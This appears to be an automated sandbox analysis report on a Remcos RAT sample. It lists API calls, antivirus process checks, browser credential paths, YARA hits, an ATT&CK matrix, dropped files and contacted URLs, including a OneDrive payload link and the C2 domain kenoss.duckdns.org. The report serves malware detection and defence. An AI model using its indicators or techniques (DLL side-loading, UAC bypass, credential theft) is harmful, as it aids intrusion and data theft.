              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoA,6_1_0040F8D1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoW,6_1_004488ED
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_1_00451CD8
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: EnumSystemLocalesW,6_1_00451F50
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: EnumSystemLocalesW,6_1_00451F9B
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: EnumSystemLocalesW,10_1_00452036
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_1_004520C3
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoW,10_1_00452313
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: EnumSystemLocalesW,10_1_00448404
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_1_0045243C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoW,10_1_00452543
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_1_00452610
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoA,10_1_0040F8D1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: GetLocaleInfoW,10_1_004488ED
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_1_00451CD8
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: EnumSystemLocalesW,10_1_00451F50
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: EnumSystemLocalesW,10_1_00451F9B
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: CoInitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,15_2_02E3D5D0
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_02E25A90
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: GetLocaleInfoA,15_2_02E2A7CC
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_02E25B9B
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFCode function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,15_2_02E45F9F
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D691C8 GetLocalTime,0_2_02D691C8
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041B60D GetComputerNameExW,GetUserNameW,6_1_0041B60D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,6_1_00449190
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D6B748 GetVersionExA,0_2_02D6B748
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: cmdagent.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: quhlpsvc.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgamsvr.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: TMBMSRV.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: Vsserv.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgupsvc.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgemc.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data6_1_0040BA12
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data10_1_0040BA12
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\6_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: \key3.db6_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\10_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: \key3.db10_1_0040BB30

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1Jump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1Jump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
              Yara detected Remcos RAT
              Source: Yara matchFile source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: cmd.exe6_1_0040569A
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: cmd.exe10_1_0040569A

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		1
              Valid Accounts              		3
              Native API              		1
              Scripting              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		12
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Shared Modules              		1
              DLL Side-Loading              		1
              Bypass User Account Control              		2
              Obfuscated Files or Information              		111
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol111
              Input Capture              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts12
              Command and Scripting Interpreter              		1
              Valid Accounts              		1
              Valid Accounts              		1
              Timestomp              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Service Execution              		1
              Windows Service              		11
              Access Token Manipulation              		1
              DLL Side-Loading              		NTDS1
              System Network Connections Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd21
              Registry Run Keys / Startup Folder              		1
              Windows Service              		1
              Bypass User Account Control              		LSA Secrets3
              File and Directory Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts321
              Process Injection              		11
              Masquerading              		Cached Domain Credentials34
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items21
              Registry Run Keys / Startup Folder              		1
              Valid Accounts              		DCSync131
              Security Software Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Access Token Manipulation              		Proc Filesystem1
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt321
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430910 Sample: udVh4Ist4Z.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 53 dual-spov-0006.spov-msedge.net 2->53 55 xirfeg.sn.files.1drv.com 2->55 57 4 other IPs or domains 2->57 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for URL or domain 2->65 67 12 other signatures 2->67 8 udVh4Ist4Z.exe 1 7 2->8         started        13 Xjfxsfmn.PIF 2->13         started        15 Xjfxsfmn.PIF 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 59 dual-spov-0006.spov-msedge.net 13.107.137.11, 443, 49710, 49711 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->59 45 C:\Users\Public\Libraries\nmfsxfjX.pif, PE32 8->45 dropped 47 C:\Users\Public\Libraries\netutils.dll, PE32+ 8->47 dropped 49 C:\Users\Public\Libraries\easinvoker.exe, PE32+ 8->49 dropped 51 C:\Users\Public\Xjfxsfmn.url, MS 8->51 dropped 83 Creates multiple autostart registry keys 8->83 85 Drops PE files with a suspicious file extension 8->85 87 Writes to foreign memory regions 8->87 19 nmfsxfjX.pif 2 3 8->19         started        23 extrac32.exe 1 8->23         started        25 cmd.exe 1 8->25         started        89 Multi AV Scanner detection for dropped file 13->89 91 Machine Learning detection for dropped file 13->91 93 Allocates memory in foreign processes 13->93 27 nmfsxfjX.pif 4 13->27         started        95 Sample uses process hollowing technique 15->95 29 nmfsxfjX.pif 15->29         started        file6 signatures7 process8 file9 39 C:\ProgramData\Remcos\remcos.exe, PE32 19->39 dropped 69 Contains functionality to bypass UAC (CMSTPLUA) 19->69 71 Detected Remcos RAT 19->71 73 Contains functionalty to change the wallpaper 19->73 81 4 other signatures 19->81 31 remcos.exe 1 19->31         started        41 C:\Users\Public\Libraries\Xjfxsfmn.PIF, PE32 23->41 dropped 75 Drops PE files with a suspicious file extension 23->75 33 conhost.exe 25->33         started        43 C:\Users\user\AppData\Roaming\...\remcos.exe, PE32 27->43 dropped 77 Creates autostart registry keys with suspicious names 27->77 79 Creates multiple autostart registry keys 27->79 35 remcos.exe 1 27->35         started        37 remcos.exe 29->37         started        signatures10 process11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              udVh4Ist4Z.exe63%ReversingLabsWin32.Trojan.Remcos
              udVh4Ist4Z.exe66%VirustotalBrowse
              udVh4Ist4Z.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\netutils.dll100%AviraTR/AVI.Agent.rqsyc
              C:\Users\Public\Libraries\Xjfxsfmn.PIF100%Joe Sandbox ML
              C:\ProgramData\Remcos\remcos.exe3%ReversingLabs
              C:\ProgramData\Remcos\remcos.exe0%VirustotalBrowse
              C:\Users\Public\Libraries\Xjfxsfmn.PIF63%ReversingLabsWin32.Trojan.Remcos
              C:\Users\Public\Libraries\Xjfxsfmn.PIF66%VirustotalBrowse
              C:\Users\Public\Libraries\easinvoker.exe0%ReversingLabs
              C:\Users\Public\Libraries\easinvoker.exe0%VirustotalBrowse
              C:\Users\Public\Libraries\netutils.dll83%ReversingLabsWin64.Trojan.Acll
              C:\Users\Public\Libraries\netutils.dll68%VirustotalBrowse
              C:\Users\Public\Libraries\nmfsxfjX.pif3%ReversingLabs
              C:\Users\Public\Libraries\nmfsxfjX.pif0%VirustotalBrowse
              C:\Users\user\AppData\Roaming\Remcos\remcos.exe3%ReversingLabs
              C:\Users\user\AppData\Roaming\Remcos\remcos.exe0%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              dual-spov-0006.spov-msedge.net0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              http://geoplugin.net/json.gp100%URL Reputationphishing
              https://sectigo.com/CPS00%URL Reputationsafe
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://geoplugin.net/json.gp/C100%URL Reputationphishing
              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
              http://ocsp.sectigo.com0C0%URL Reputationsafe
              kenoss.duckdns.org0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              dual-spov-0006.spov-msedge.net
              		13.107.137.11
              		truetrueunknown
              onedrive.live.com
              		unknown
              		unknownfalse
                		high
                xirfeg.sn.files.1drv.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://onedrive.live.com/download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pUfalse
                    		high
                    kenoss.duckdns.orgtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gpnmfsxfjX.piftrue
                    • URL Reputation: phishing
                    • URL Reputation: phishing
                    		unknown
                    https://xirfeg.sn.files.1drv.com/y4mA7VtsLBctMjPvNeW-nBjYzK-kMyIJaIZdFZhf0ai66qWNCa5Jqdc_iM5uVKa3zxnXjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.0000000000764000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://xirfeg.sn.files.1drv.com/y4mmJkpN2-URpDPce1turH6bNoPZHs8qohGTBPPgUSqUu1WeGjpTknCmr6n8UWtLOerudVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000071C000.00000004.00000020.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://onedrive.live.com/SXjfxsfmn.PIF, 0000000F.00000003.2559378885.00000000006F6000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://xirfeg.sn.files.1drv.com:443/y4mA7VtsLBctMjPvNeW-nBjYzK-kMyIJaIZdFZhf0ai66qWNCa5Jqdc_iM5uVKaXjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
